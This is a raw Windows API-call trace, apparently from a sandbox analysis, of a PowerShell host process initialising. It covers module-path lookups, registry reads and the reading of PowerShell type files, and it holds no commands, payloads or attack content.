	[0141.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.900] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0141.900] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0141.900] CoTaskMemFree (pv=0x2e4430) 
	[0141.901] CoTaskMemAlloc (cb=0xcc) returned 0x3ad270
	[0141.901] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3ad270, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.902] CoTaskMemFree (pv=0x3ad270) 
	[0141.902] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd798 | out: phkResult=0xbd798*=0x1c8) returned 0x0
	[0141.902] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xbd71c, lpData=0x0, lpcbData=0xbd718*=0x0 | out: lpType=0xbd71c*=0x2, lpData=0x0, lpcbData=0xbd718*=0x6c) returned 0x0
	[0141.902] CoTaskMemAlloc (cb=0x70) returned 0x32be90
	[0141.902] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xbd6ec, lpData=0x32be90, lpcbData=0xbd6e8*=0x6c | out: lpType=0xbd6ec*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xbd6e8*=0x6c) returned 0x0
	[0141.902] CoTaskMemFree (pv=0x32be90) 
	[0141.902] CoTaskMemAlloc (cb=0xcc) returned 0x3ad270
	[0141.902] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3ad270, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0141.902] CoTaskMemFree (pv=0x3ad270) 
	[0141.902] CoTaskMemAlloc (cb=0xcc) returned 0x3ad270
	[0141.902] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3ad270, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.902] CoTaskMemFree (pv=0x3ad270) 
	[0141.905] RegCloseKey (hKey=0x1c8) returned 0x0
	[0141.905] CoTaskMemAlloc (cb=0xcc) returned 0x3ad270
	[0141.905] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3ad270, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.906] CoTaskMemFree (pv=0x3ad270) 
	[0141.906] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd798 | out: phkResult=0xbd798*=0x1c8) returned 0x0
	[0141.906] RegQueryValueExW (in: hKey=0x1c8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xbd71c, lpData=0x0, lpcbData=0xbd718*=0x0 | out: lpType=0xbd71c*=0x0, lpData=0x0, lpcbData=0xbd718*=0x0) returned 0x2
	[0141.906] RegCloseKey (hKey=0x1c8) returned 0x0
	[0145.981] CoTaskMemAlloc (cb=0x20c) returned 0x1b76bb60
	[0145.982] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b76bb60 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0145.983] CoTaskMemFree (pv=0x1b76bb60) 
	[0145.983] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xbd320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0145.983] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0145.993] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0145.993] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.993] CoTaskMemFree (pv=0x2e4430) 
	[0145.995] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0145.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.995] CoTaskMemFree (pv=0x2e4430) 
	[0146.005] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0146.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.005] CoTaskMemFree (pv=0x2e4430) 
	[0146.006] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0146.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.006] CoTaskMemFree (pv=0x2e4430) 
	[0146.012] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd588 | out: phkResult=0xbd588*=0x328) returned 0x0
	[0146.014] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xbd59c, lpData=0x0, lpcbData=0xbd598*=0x0 | out: lpType=0xbd59c*=0x1, lpData=0x0, lpcbData=0xbd598*=0x74) returned 0x0
	[0146.015] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xbd50c, lpData=0x0, lpcbData=0xbd508*=0x0 | out: lpType=0xbd50c*=0x1, lpData=0x0, lpcbData=0xbd508*=0x74) returned 0x0
	[0146.015] CoTaskMemAlloc (cb=0x78) returned 0x32be90
	[0146.015] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xbd4dc, lpData=0x32be90, lpcbData=0xbd4d8*=0x74 | out: lpType=0xbd4dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xbd4d8*=0x74) returned 0x0
	[0146.015] CoTaskMemFree (pv=0x32be90) 
	[0146.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xbd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0146.015] SetErrorMode (uMode=0x1) returned 0x1
	[0146.015] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xbd460 | out: lpFileInformation=0xbd460*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0146.015] SetErrorMode (uMode=0x1) returned 0x1
	[0146.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xbd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0146.209] SetErrorMode (uMode=0x1) returned 0x1
	[0146.209] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd460 | out: lpFileInformation=0xbd460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0146.209] SetErrorMode (uMode=0x1) returned 0x1
	[0146.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xbd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0146.213] SetErrorMode (uMode=0x1) returned 0x1
	[0146.213] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd460 | out: lpFileInformation=0xbd460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0146.213] SetErrorMode (uMode=0x1) returned 0x1
	[0146.216] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0146.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.216] CoTaskMemFree (pv=0x2e4430) 
	[0146.223] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0146.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.223] CoTaskMemFree (pv=0x2e4430) 
	[0146.224] GetACP () returned 0x4e4
	[0146.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xbce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0146.777] SetErrorMode (uMode=0x1) returned 0x1
	[0146.778] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0146.779] GetFileType (hFile=0x32c) returned 0x1
	[0146.779] SetErrorMode (uMode=0x1) returned 0x1
	[0146.779] GetFileType (hFile=0x32c) returned 0x1
	[0146.783] ReadFile (in: hFile=0x32c, lpBuffer=0x2d82e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2d82e58*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0146.786] ReadFile (in: hFile=0x32c, lpBuffer=0x2d82e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2d82e58*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0146.786] ReadFile (in: hFile=0x32c, lpBuffer=0x2d82e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2d82e58*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0146.787] ReadFile (in: hFile=0x32c, lpBuffer=0x2d82e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2d82e58*, lpNumberOfBytesRead=0xbd398*=0xcf3, lpOverlapped=0x0) returned 1
	[0146.787] ReadFile (in: hFile=0x32c, lpBuffer=0x2d822b3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2d822b3*, lpNumberOfBytesRead=0xbd398*=0x0, lpOverlapped=0x0) returned 1
	[0146.787] ReadFile (in: hFile=0x32c, lpBuffer=0x2d82e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2d82e58*, lpNumberOfBytesRead=0xbd398*=0x0, lpOverlapped=0x0) returned 1
	[0146.789] CloseHandle (hObject=0x32c) returned 1
	[0146.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xbd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0146.793] SetErrorMode (uMode=0x1) returned 0x1
	[0146.793] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd310 | out: lpFileInformation=0xbd310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0146.793] SetErrorMode (uMode=0x1) returned 0x1
	[0146.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xbd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0146.795] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd3f8 | out: phkResult=0xbd3f8*=0x32c) returned 0x0
	[0146.795] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd37c, lpData=0x0, lpcbData=0xbd378*=0x0 | out: lpType=0xbd37c*=0x1, lpData=0x0, lpcbData=0xbd378*=0x56) returned 0x0
	[0146.795] CoTaskMemAlloc (cb=0x5a) returned 0x1b76f380
	[0146.795] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd34c, lpData=0x1b76f380, lpcbData=0xbd348*=0x56 | out: lpType=0xbd34c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xbd348*=0x56) returned 0x0
	[0146.795] CoTaskMemFree (pv=0x1b76f380) 
	[0146.795] RegCloseKey (hKey=0x32c) returned 0x0
	[0146.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xbd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0146.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xbcef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.318] GetSystemInfo (in: lpSystemInfo=0xbc030 | out: lpSystemInfo=0xbc030*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.319] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xbce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.364] SetErrorMode (uMode=0x1) returned 0x1
	[0149.364] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0149.364] GetFileType (hFile=0x32c) returned 0x1
	[0149.364] SetErrorMode (uMode=0x1) returned 0x1
	[0149.364] GetFileType (hFile=0x32c) returned 0x1
	[0149.364] ReadFile (in: hFile=0x32c, lpBuffer=0x2dea018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2dea018*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.365] ReadFile (in: hFile=0x32c, lpBuffer=0x2dea018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2dea018*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.365] ReadFile (in: hFile=0x32c, lpBuffer=0x2dea018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2dea018*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.377] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.377] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.377] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.377] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.377] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.377] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.379] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.379] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.379] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.380] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.380] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.380] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.380] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.381] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.383] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.383] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.384] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.384] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.384] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.384] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.385] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.385] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.385] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.385] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
